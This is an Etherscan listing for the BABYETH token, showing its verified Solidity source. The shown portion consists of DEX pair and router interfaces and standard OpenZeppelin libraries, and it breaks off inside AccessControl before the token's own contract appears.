ETH Price: $2,392.05 (+0.12%)

Token

BABY ETHEREUM (BABYETH)
 

Overview

Max Total Supply

10,000,000,000 BABYETH

Holders

514

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 BABYETH

Value
$0.00
0x41c3f8790b839b92cfae8fdedb5d2c241c85cdc9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Token

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-30
*/

// SPDX-License-Identifier: GPL-3.0

pragma solidity ^0.8.4;

interface IPancakePair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}
// File: ISwapFactory.sol


pragma solidity ^0.8.4;

interface ISwapFactory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
    function getPair(address tokenA, address tokenB) external returns (address pair);
}
// File: ISwapRouter.sol


pragma solidity ^0.8.4;

interface ISwapRouter {
    
    function factoryV2() external pure returns (address);

    function factory() external pure returns (address);

    function WETH() external pure returns (address);
    
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to
    ) external;

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    
    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
    
}
// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/utils/math/SignedMath.sol


// OpenZeppelin Contracts (last updated v4.8.0) (utils/math/SignedMath.sol)

pragma solidity ^0.8.0;

/**
 * @dev Standard signed math utilities missing in the Solidity language.
 */
library SignedMath {
    /**
     * @dev Returns the largest of two signed numbers.
     */
    function max(int256 a, int256 b) internal pure returns (int256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two signed numbers.
     */
    function min(int256 a, int256 b) internal pure returns (int256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two signed numbers without overflow.
     * The result is rounded towards zero.
     */
    function average(int256 a, int256 b) internal pure returns (int256) {
        // Formula from the book "Hacker's Delight"
        int256 x = (a & b) + ((a ^ b) >> 1);
        return x + (int256(uint256(x) >> 255) & (a ^ b));
    }

    /**
     * @dev Returns the absolute unsigned value of a signed value.
     */
    function abs(int256 n) internal pure returns (uint256) {
        unchecked {
            // must be unchecked in order to support `n = type(int256).min`
            return uint256(n >= 0 ? n : -n);
        }
    }
}

// File: @openzeppelin/contracts/utils/math/Math.sol


// OpenZeppelin Contracts (last updated v4.9.0) (utils/math/Math.sol)

pragma solidity ^0.8.0;

/**
 * @dev Standard math utilities missing in the Solidity language.
 */
library Math {
    enum Rounding {
        Down, // Toward negative infinity
        Up, // Toward infinity
        Zero // Toward zero
    }

    /**
     * @dev Returns the largest of two numbers.
     */
    function max(uint256 a, uint256 b) internal pure returns (uint256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two numbers.
     */
    function min(uint256 a, uint256 b) internal pure returns (uint256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two numbers. The result is rounded towards
     * zero.
     */
    function average(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b) / 2 can overflow.
        return (a & b) + (a ^ b) / 2;
    }

    /**
     * @dev Returns the ceiling of the division of two numbers.
     *
     * This differs from standard division with `/` in that it rounds up instead
     * of rounding down.
     */
    function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b - 1) / b can overflow on addition, so we distribute.
        return a == 0 ? 0 : (a - 1) / b + 1;
    }

    /**
     * @notice Calculates floor(x * y / denominator) with full precision. Throws if result overflows a uint256 or denominator == 0
     * @dev Original credit to Remco Bloemen under MIT license (https://xn--2-umb.com/21/muldiv)
     * with further edits by Uniswap Labs also under MIT license.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator) internal pure returns (uint256 result) {
        unchecked {
            // 512-bit multiply [prod1 prod0] = x * y. Compute the product mod 2^256 and mod 2^256 - 1, then use
            // use the Chinese Remainder Theorem to reconstruct the 512 bit result. The result is stored in two 256
            // variables such that product = prod1 * 2^256 + prod0.
            uint256 prod0; // Least significant 256 bits of the product
            uint256 prod1; // Most significant 256 bits of the product
            assembly {
                let mm := mulmod(x, y, not(0))
                prod0 := mul(x, y)
                prod1 := sub(sub(mm, prod0), lt(mm, prod0))
            }

            // Handle non-overflow cases, 256 by 256 division.
            if (prod1 == 0) {
                // Solidity will revert if denominator == 0, unlike the div opcode on its own.
                // The surrounding unchecked block does not change this fact.
                // See https://docs.soliditylang.org/en/latest/control-structures.html#checked-or-unchecked-arithmetic.
                return prod0 / denominator;
            }

            // Make sure the result is less than 2^256. Also prevents denominator == 0.
            require(denominator > prod1, "Math: mulDiv overflow");

            ///////////////////////////////////////////////
            // 512 by 256 division.
            ///////////////////////////////////////////////

            // Make division exact by subtracting the remainder from [prod1 prod0].
            uint256 remainder;
            assembly {
                // Compute remainder using mulmod.
                remainder := mulmod(x, y, denominator)

                // Subtract 256 bit number from 512 bit number.
                prod1 := sub(prod1, gt(remainder, prod0))
                prod0 := sub(prod0, remainder)
            }

            // Factor powers of two out of denominator and compute largest power of two divisor of denominator. Always >= 1.
            // See https://cs.stackexchange.com/q/138556/92363.

            // Does not overflow because the denominator cannot be zero at this stage in the function.
            uint256 twos = denominator & (~denominator + 1);
            assembly {
                // Divide denominator by twos.
                denominator := div(denominator, twos)

                // Divide [prod1 prod0] by twos.
                prod0 := div(prod0, twos)

                // Flip twos such that it is 2^256 / twos. If twos is zero, then it becomes one.
                twos := add(div(sub(0, twos), twos), 1)
            }

            // Shift in bits from prod1 into prod0.
            prod0 |= prod1 * twos;

            // Invert denominator mod 2^256. Now that denominator is an odd number, it has an inverse modulo 2^256 such
            // that denominator * inv = 1 mod 2^256. Compute the inverse by starting with a seed that is correct for
            // four bits. That is, denominator * inv = 1 mod 2^4.
            uint256 inverse = (3 * denominator) ^ 2;

            // Use the Newton-Raphson iteration to improve the precision. Thanks to Hensel's lifting lemma, this also works
            // in modular arithmetic, doubling the correct bits in each step.
            inverse *= 2 - denominator * inverse; // inverse mod 2^8
            inverse *= 2 - denominator * inverse; // inverse mod 2^16
            inverse *= 2 - denominator * inverse; // inverse mod 2^32
            inverse *= 2 - denominator * inverse; // inverse mod 2^64
            inverse *= 2 - denominator * inverse; // inverse mod 2^128
            inverse *= 2 - denominator * inverse; // inverse mod 2^256

            // Because the division is now exact we can divide by multiplying with the modular inverse of denominator.
            // This will give us the correct result modulo 2^256. Since the preconditions guarantee that the outcome is
            // less than 2^256, this is the final result. We don't need to compute the high bits of the result and prod1
            // is no longer required.
            result = prod0 * inverse;
            return result;
        }
    }

    /**
     * @notice Calculates x * y / denominator with full precision, following the selected rounding direction.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) {
        uint256 result = mulDiv(x, y, denominator);
        if (rounding == Rounding.Up && mulmod(x, y, denominator) > 0) {
            result += 1;
        }
        return result;
    }

    /**
     * @dev Returns the square root of a number. If the number is not a perfect square, the value is rounded down.
     *
     * Inspired by Henry S. Warren, Jr.'s "Hacker's Delight" (Chapter 11).
     */
    function sqrt(uint256 a) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }

        // For our first guess, we get the biggest power of 2 which is smaller than the square root of the target.
        //
        // We know that the "msb" (most significant bit) of our target number `a` is a power of 2 such that we have
        // `msb(a) <= a < 2*msb(a)`. This value can be written `msb(a)=2**k` with `k=log2(a)`.
        //
        // This can be rewritten `2**log2(a) <= a < 2**(log2(a) + 1)`
        // → `sqrt(2**k) <= sqrt(a) < sqrt(2**(k+1))`
        // → `2**(k/2) <= sqrt(a) < 2**((k+1)/2) <= 2**(k/2 + 1)`
        //
        // Consequently, `2**(log2(a) / 2)` is a good first approximation of `sqrt(a)` with at least 1 correct bit.
        uint256 result = 1 << (log2(a) >> 1);

        // At this point `result` is an estimation with one bit of precision. We know the true value is a uint128,
        // since it is the square root of a uint256. Newton's method converges quadratically (precision doubles at
        // every iteration). We thus need at most 7 iteration to turn our partial result with one bit of precision
        // into the expected uint128 result.
        unchecked {
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            return min(result, a / result);
        }
    }

    /**
     * @notice Calculates sqrt(a), following the selected rounding direction.
     */
    function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = sqrt(a);
            return result + (rounding == Rounding.Up && result * result < a ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 2, rounded down, of a positive value.
     * Returns 0 if given 0.
     */
    function log2(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 128;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 64;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 32;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 16;
            }
            if (value >> 8 > 0) {
                value >>= 8;
                result += 8;
            }
            if (value >> 4 > 0) {
                value >>= 4;
                result += 4;
            }
            if (value >> 2 > 0) {
                value >>= 2;
                result += 2;
            }
            if (value >> 1 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 2, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log2(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log2(value);
            return result + (rounding == Rounding.Up && 1 << result < value ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 10, rounded down, of a positive value.
     * Returns 0 if given 0.
     */
    function log10(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >= 10 ** 64) {
                value /= 10 ** 64;
                result += 64;
            }
            if (value >= 10 ** 32) {
                value /= 10 ** 32;
                result += 32;
            }
            if (value >= 10 ** 16) {
                value /= 10 ** 16;
                result += 16;
            }
            if (value >= 10 ** 8) {
                value /= 10 ** 8;
                result += 8;
            }
            if (value >= 10 ** 4) {
                value /= 10 ** 4;
                result += 4;
            }
            if (value >= 10 ** 2) {
                value /= 10 ** 2;
                result += 2;
            }
            if (value >= 10 ** 1) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 10, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log10(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log10(value);
            return result + (rounding == Rounding.Up && 10 ** result < value ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 256, rounded down, of a positive value.
     * Returns 0 if given 0.
     *
     * Adding one to the result gives the number of pairs of hex symbols needed to represent `value` as a hex string.
     */
    function log256(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 16;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 8;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 4;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 2;
            }
            if (value >> 8 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 256, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log256(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log256(value);
            return result + (rounding == Rounding.Up && 1 << (result << 3) < value ? 1 : 0);
        }
    }
}

// File: @openzeppelin/contracts/utils/Strings.sol


// OpenZeppelin Contracts (last updated v4.9.0) (utils/Strings.sol)

pragma solidity ^0.8.0;



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _SYMBOLS = "0123456789abcdef";
    uint8 private constant _ADDRESS_LENGTH = 20;

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        unchecked {
            uint256 length = Math.log10(value) + 1;
            string memory buffer = new string(length);
            uint256 ptr;
            /// @solidity memory-safe-assembly
            assembly {
                ptr := add(buffer, add(32, length))
            }
            while (true) {
                ptr--;
                /// @solidity memory-safe-assembly
                assembly {
                    mstore8(ptr, byte(mod(value, 10), _SYMBOLS))
                }
                value /= 10;
                if (value == 0) break;
            }
            return buffer;
        }
    }

    /**
     * @dev Converts a `int256` to its ASCII `string` decimal representation.
     */
    function toString(int256 value) internal pure returns (string memory) {
        return string(abi.encodePacked(value < 0 ? "-" : "", toString(SignedMath.abs(value))));
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        unchecked {
            return toHexString(value, Math.log256(value) + 1);
        }
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }

    /**
     * @dev Converts an `address` with fixed length of 20 bytes to its not checksummed ASCII `string` hexadecimal representation.
     */
    function toHexString(address addr) internal pure returns (string memory) {
        return toHexString(uint256(uint160(addr)), _ADDRESS_LENGTH);
    }

    /**
     * @dev Returns true if the two strings are equal.
     */
    function equal(string memory a, string memory b) internal pure returns (bool) {
        return keccak256(bytes(a)) == keccak256(bytes(b));
    }
}

// File: @openzeppelin/contracts/access/IAccessControl.sol


// OpenZeppelin Contracts v4.4.1 (access/IAccessControl.sol)

pragma solidity ^0.8.0;

/**
 * @dev External interface of AccessControl declared to support ERC165 detection.
 */
interface IAccessControl {
    /**
     * @dev Emitted when `newAdminRole` is set as ``role``'s admin role, replacing `previousAdminRole`
     *
     * `DEFAULT_ADMIN_ROLE` is the starting admin for all roles, despite
     * {RoleAdminChanged} not being emitted signaling this.
     *
     * _Available since v3.1._
     */
    event RoleAdminChanged(bytes32 indexed role, bytes32 indexed previousAdminRole, bytes32 indexed newAdminRole);

    /**
     * @dev Emitted when `account` is granted `role`.
     *
     * `sender` is the account that originated the contract call, an admin role
     * bearer except when using {AccessControl-_setupRole}.
     */
    event RoleGranted(bytes32 indexed role, address indexed account, address indexed sender);

    /**
     * @dev Emitted when `account` is revoked `role`.
     *
     * `sender` is the account that originated the contract call:
     *   - if using `revokeRole`, it is the admin role bearer
     *   - if using `renounceRole`, it is the role bearer (i.e. `account`)
     */
    event RoleRevoked(bytes32 indexed role, address indexed account, address indexed sender);

    /**
     * @dev Returns `true` if `account` has been granted `role`.
     */
    function hasRole(bytes32 role, address account) external view returns (bool);

    /**
     * @dev Returns the admin role that controls `role`. See {grantRole} and
     * {revokeRole}.
     *
     * To change a role's admin, use {AccessControl-_setRoleAdmin}.
     */
    function getRoleAdmin(bytes32 role) external view returns (bytes32);

    /**
     * @dev Grants `role` to `account`.
     *
     * If `account` had not been already granted `role`, emits a {RoleGranted}
     * event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     */
    function grantRole(bytes32 role, address account) external;

    /**
     * @dev Revokes `role` from `account`.
     *
     * If `account` had been granted `role`, emits a {RoleRevoked} event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     */
    function revokeRole(bytes32 role, address account) external;

    /**
     * @dev Revokes `role` from the calling account.
     *
     * Roles are often managed via {grantRole} and {revokeRole}: this function's
     * purpose is to provide a mechanism for accounts to lose their privileges
     * if they are compromised (such as when a trusted device is misplaced).
     *
     * If the calling account had been granted `role`, emits a {RoleRevoked}
     * event.
     *
     * Requirements:
     *
     * - the caller must be `account`.
     */
    function renounceRole(bytes32 role, address account) external;
}

// File: @openzeppelin/contracts/utils/math/SafeMath.sol


// OpenZeppelin Contracts (last updated v4.9.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/AccessControl.sol


// OpenZeppelin Contracts (last updated v4.9.0) (access/AccessControl.sol)

pragma solidity ^0.8.0;





/**
 * @dev Contract module that allows children to implement role-based access
 * control mechanisms. This is a lightweight version that doesn't allow enumerating role
 * members except through off-chain means by accessing the contract event logs. Some
 * applications may benefit from on-chain enumerability, for those cases see
 * {AccessControlEnumerable}.
 *
 * Roles are referred to by their `bytes32` identifier. These should be exposed
 * in the external API and be unique. The best way to achieve this is by
 * using `public constant` hash digests:
 *
 * ```solidity
 * bytes32 public constant MY_ROLE = keccak256("MY_ROLE");
 * ```
 *
 * Roles can be used to represent a set of permissions. To restrict access to a
 * function call, use {hasRole}:
 *
 * ```solidity
 * function foo() public {
 *     require(hasRole(MY_ROLE, msg.sender));
 *     ...
 * }
 * ```
 *
 * Roles can be granted and revoked dynamically via the {grantRole} and
 * {revokeRole} functions. Each role has an associated admin role, and only
 * accounts that have a role's admin role can call {grantRole} and {revokeRole}.
 *
 * By default, the admin role for all roles is `DEFAULT_ADMIN_ROLE`, which means
 * that only accounts with this role will be able to grant or revoke other
 * roles. More complex role relationships can be created by using
 * {_setRoleAdmin}.
 *
 * WARNING: The `DEFAULT_ADMIN_ROLE` is also its own admin: it has permission to
 * grant and revoke this role. Extra precautions should be taken to secure
 * accounts that have been granted it. We recommend using {AccessControlDefaultAdminRules}
 * to enforce additional security measures for this role.
 */
abstract contract AccessControl is Context, IAccessControl, ERC165 {
    struct RoleData {
        mapping(address => bool) members;
        bytes32 adminRole;
    }

    mapping(bytes32 => RoleData) private _roles;

    bytes32 public constant DEFAULT_ADMIN_ROLE = 0x00;

    /**
     * @dev Modifier that checks that an account has a specific role. Reverts
     * with a standardized message including the required role.
     *
     * The format of the revert reason is given by the following regular expression:
     *
     *  /^AccessControl: account (0x[0-9a-f]{40}) is missing role (0x[0-9a-f]{64})$/
     *
     * _Available since v4.1._
     */
    modifier onlyRole(bytes32 role) {
        _checkRole(role);
        _;
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IAccessControl).interfaceId || super.supportsInterface(interfaceId);
    }

    /**
     * @dev Returns `true` if `account` has been granted `role`.
     */
    function hasRole(bytes32 role, address account) public view virtual override returns (bool) {
        return _roles[role].members[account];
    }

    /**
     * @dev Revert with a standard message if `_msgSender()` is missing `role`.
     * Overriding this function changes the behavior of the {onlyRole} modifier.
     *
     * Format of the revert message is described in {_checkRole}.
     *
     * _Available since v4.6._
     */
    function _checkRole(bytes32 role) internal view virtual {
        _checkRole(role, _msgSender());
    }

    /**
     * @dev Revert with a standard message if `account` is missing `role`.
     *
     * The format of the revert reason is given by the following regular expression:
     *
     *  /^AccessControl: account (0x[0-9a-f]{40}) is missing role (0x[0-9a-f]{64})$/
     */
    function _checkRole(bytes32 role, address account) internal view virtual {
        if (!hasRole(role, account)) {
            revert(
                string(
                    abi.encodePacked(
                        "AccessControl: account ",
                        Strings.toHexString(account),
                        " is missing role ",
                        Strings.toHexString(uint256(role), 32)
                    )
                )
            );
        }
    }

    /**
     * @dev Returns the admin role that controls `role`. See {grantRole} and
     * {revokeRole}.
     *
     * To change a role's admin, use {_setRoleAdmin}.
     */
    function getRoleAdmin(bytes32 role) public view virtual override returns (bytes32) {
        return _roles[role].adminRole;
    }

    /**
     * @dev Grants `role` to `account`.
     *
     * If `account` had not been already granted `role`, emits a {RoleGranted}
     * event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     *
     * May emit a {RoleGranted} event.
     */
    function grantRole(bytes32 role, address account) public virtual override onlyRole(getRoleAdmin(role)) {
        _grantRole(role, account);
    }

    /**
     * @dev Revokes `role` from `account`.
     *
     * If `account` had been granted `role`, emits a {RoleRevoked} event.
     *
     * Requirements:
     *
     * - the caller must have ``role``'s admin role.
     *
     * May emit a {RoleRevoked} event.
     */
    function revokeRole(bytes32 role, address account) public virtual override onlyRole(getRoleAdmin(role)) {
        _revokeRole(role, account);
    }

    /**
     * @dev Revokes `role` from the calling account.
     *
